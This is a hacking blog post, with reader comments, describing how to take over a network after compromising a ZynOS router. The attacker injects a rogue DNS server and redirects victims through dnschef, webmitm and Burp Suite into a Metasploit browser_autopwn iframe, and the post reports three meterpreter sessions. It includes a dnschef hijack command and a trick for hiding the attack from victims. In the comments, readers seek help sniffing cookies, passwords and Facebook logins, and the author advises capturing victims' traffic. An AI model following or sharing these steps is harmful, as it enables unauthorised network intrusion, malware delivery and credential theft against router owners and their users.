ZynOS – Part 2 ( Taking over the network )

Hello again🙂

I’m going to recap from the last post. So what I’m about to demonstrate in this post is the impact that can some attacker cause to your network once he access the router  ..

We have access to the router but our goal is to get a foothold on the remote network, hmm .. we have port forwarding option which is beautiful, what we can do with that is scrap the network pool for internal IPs and forward ports like 445, 139 and try to exploit them from our end. Imagine also a network with 200 machines that will definitely be time consuming .. even if you write a script to automate that what makes you believe that you’re going to actually be able to get meterpreter sessions ?

So .. what’s the solution ?

Hmm, DNS is an interesting thing to look at since we can provide dns IP to the router for the whole network to use !!

Are we talking about DNS intercepting ? Hell yeah😀

Here is a list of the tools we’re going to use :

Dnschef : A dns proxy ( read about it HERE )
Metasploit : How to install ( ubuntu ) HERE
Webmitm : Find out more about it HERE
Burp Suite : It’s available HERE

-Attacking from ubuntu “Metasploit & dnschef & webmitm” running on (IP: 192.168.0.6)

-Burp suite will be running at (IP:192.168.0.10)

First, I’ll explain how I’m going to do the attack :

We’re going to setup our Dnschef proxy

Screen Shot 2014-01-18 at 1.30.27 PM

./dnschef.py –interface 192.168.1.106 –fakeip 192.168.1.106 

–interface : is going to tell dnschef at what interface it’ll listen for .

–fakeip : this hijacks requests by returning this IP as the result for every request

The next step is to lunch webmitm tool that will handle the http requests and responses, from there we’ll tell webmitm tool to forward the traffic to burp suite proxy that will allow us to inject an iframe of Metasploit browser autopwn server.

Screen Shot 2014-01-18 at 1.38.01 PM

We have to configure burp suite so that it handle requests on port 80

Screen Shot 2014-01-18 at 1.40.00 PM

Have to be invisible ..

Screen Shot 2014-01-18 at 1.40.16 PM

Repeat these steps for port 443 to handle HTTPS traffic .

Ok, so everything is ready now .. I’ll have to modify the scripts I provided in the previous post so that we can inject our DNS server .

Screen Shot 2014-01-18 at 1.49.47 PM

This way I injected my ip address as the first DNS server to use on the router and the 2nd one is the one that belongs to google, this way if  we want to stop the attack on the already injected routers by blocking requests made to our DNS server , then the router will automatically proceed to the 2nd server that belongs to google without showing any DNS resolution error on the victim end.

ok, so now we’ll have to lunch the browser autopwn module on metasploit .

PS: I’ll be using port “8080” because webmitm is already using port “80” to forward traffic .

Screen Shot 2014-01-18 at 2.10.54 PM

Screen Shot 2014-01-18 at 2.12.09 PM

it’s loaded and waiting for victims to browse🙂

Ok, so from here we’ll have to add the iframe injection to burp suite. So that if it get a response on a page requested by the victim it injects iframe with “http://192.168.0.6:8080/” that’s listening on Metasploit.

Screen Shot 2014-01-18 at 2.11.33 PM

DEMO :

After injecting my DNS server to the victim router using the scripts, and after setting up everything from dnschef to metasploit . Let’s follow what happens if a victim browse to a website .

Screen Shot 2014-01-18 at 2.18.13 PM

We got 3 meterpreter sessions😀,

DO YOU REALIZE WHAT CAN SOMEONE DO IF HE HACKS INTO YOUR ROUTER WITH SOME VULNERABILITY OR JUST DEFAULT PASSWORDS THAT YOU DIDN’T CHANGE ?

Any questions or comments feel free to contact me. And as always : Happy Hacking🙂

19 thoughts on “ZynOS – Part 2 ( Taking over the network )

  1. HackiM says:

    great job dude
    that’s what i call automation

    root

  2. jove says:

    hi bro
    vey nice job ….
    i have question …
    what can i do if want to sniff data such as cookie or password from data in router ?

    tanx

  3. jove says:

    i mean dont use Metasploit …. just sniffing data or fishing some website like facebook…

    sorry for spam

    • Nasro says:

      Hi, thanks for you comments . Well, I understand what you are willing to do .. so what i recommend is just proceed with the steps i provided and then lunch your wireshark or any other packer sniffing software and then you should see data, basically all of the victim’s traffic is going through your computer🙂 .

      I hope this helps ..

      • jov says:

        tanQ i use dnschef and webmitm -d and than i run dsnif and work well now i want to change script becuse it use sabnet cdr …. and i want to use ip range :

        you use IPNetwork subnet :

        for ip in IPNetwork (‘0.0.0.1/24’):

        and i want to use ip range
        for example :

        netaddr.iprange_to_cidrs (‘0.0.0.1 , 255.255.255.255’):

        any idea ?

        tanq brother 🙂

  4. Led says:

    this site is no longer available : http://50.57.229.26/zynos.php !!

  5. Morched says:

    123 vive l’algerie😉
    sorry coz i’m so bad in english & i wanna learn from u if u want, but in arabic
    is there anyway to contact u ?

  6. Mohamed Essam says:

    Nasro can u make this tutorial in short video please
    i got some error when i use dnschef
    thx😉

  7. Ahmed Sherif says:

    Great Tutorial …. but how will packets forwarded automatically from burpsuite proxy

  8. […] Routers provided by Algerie Telecom, has also published the practical demonstration on ‘How to Hack Victim’s computer and accounts by hijacking Router’s DNS server‘. To perform this, he used DNS Proxy tool ‘Dnschef’ and exploitation tools […]

  9. flames says:

    Hi nasro,, can i contact u via email?

  10. mhndsh says:

    Hi,
    it’s a great code by python that one for zynos attack… but i can’t get results as the str1 is empty!! or the result of the decoded.php is something like “There was an error uploading the file, please try again!”.. like when you access the page like this”
    http://198.61.167.113/zynos/decoded.php
    any help please?

  11. […] Routers provided by Algerie Telecom, has also published the practical demonstration on ‘How to Hack Victim’s computer and accounts by hijacking Router’s DNS server‘. To perform this, he used DNS Proxy tool ‘Dnschef’ and exploitation tools […]

  12. Moussa MBS says:

    that’s good !!

  13. Raydan says:

    Hi Nassro

    good work

    while running the script im getting the following error

    Traceback (most recent call last):
    File “C:\Users\raydan\Desktop\zynos-attacker-master\zynos-attacker-master\attack.py”, line 1, in
    from netaddr import IPNetwork
    ImportError: No module named netaddr

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: